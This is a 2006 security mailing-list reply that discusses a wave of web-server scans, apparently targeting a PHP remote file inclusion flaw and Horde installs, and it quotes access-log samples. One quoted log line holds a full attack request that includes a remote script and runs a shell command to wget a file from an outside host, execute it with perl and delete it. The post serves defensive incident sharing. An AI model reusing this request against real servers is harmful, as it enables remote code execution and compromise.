On Sat, 13 May 2006, Daniel Cid wrote: > Since Thursday night I'm seeing a high volume of scans > on different web servers for possibly the following > vulns: > > http://secunia.com/advisories/14337/ > http://www.osvdb.org/displayvuln.php?osvdb_id=10180 > > > However, they say the problem is on function.php and > I'm seeing them on index.php. Can anyone confirm that? > > Some log samples: > > 200.80.39.39 - - [12/May/2006:15:27:28 -0300] "GET > /index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://luxsurf.com/images/cmd.txt?&cmd=cd%20/tmp;wget%20http://luxsurf.com/images/xentonix;perl%20xentonix;rm%20-rf%20xentonix? > HTTP/1.0" 404 167 "-" "Mozilla/5.0" > 217.160.131.47 - - [12/May/2006:15:34:30 -0300] "GET
We are see horde attepts here. 222.233.120.3 - - [12/May/2006:23:59:11 -0500] "GET /horde-3.0.9//README HTTP/1.1" 404 806 222.233.120.3 - - [12/May/2006:23:59:11 -0500] "GET /horde-3.0.9//README HTTP/1.1" 404 806 222.233.120.3 - - [12/May/2006:23:59:11 -0500] "GET /Horde//README HTTP/1.1" 404 806 222.233.120.3 - - [12/May/2006:23:59:11 -0500] "GET /Horde//README HTTP/1.1" 404 806 204.11.239.43 - - [13/May/2006:13:28:21 -0500] "GET //README HTTP/1.1" 403 791 204.11.239.43 - - [13/May/2006:13:28:21 -0500] "GET /horde//README HTTP/1.1" 404 806 204.11.239.43 - - [13/May/2006:13:28:21 -0500] "GET /horde2//README HTTP/1.1" 404 806 204.11.239.43 - - [13/May/2006:13:28:22 -0500] "GET /horde3//README HTTP/1.1" 404 806 204.11.239.43 - - [13/May/2006:13:28:22 -0500] "GET /horde-3.0.9//README HTTP/1.1" 404 806 204.11.239.43 - - [13/May/2006:13:28:22 -0500] "GET /Horde//README HTTP/1.1" 404 806 Interestingly, putting a zero lenght file (link to /dev/zero here) "/a1b2c3d4e5f6g7h8i9/nonexistentfile.php" seems to stop them dead... Gotta wonder about the error checking in the 'spoit ;) -- Karl Schlitt [EMAIL PROTECTED]
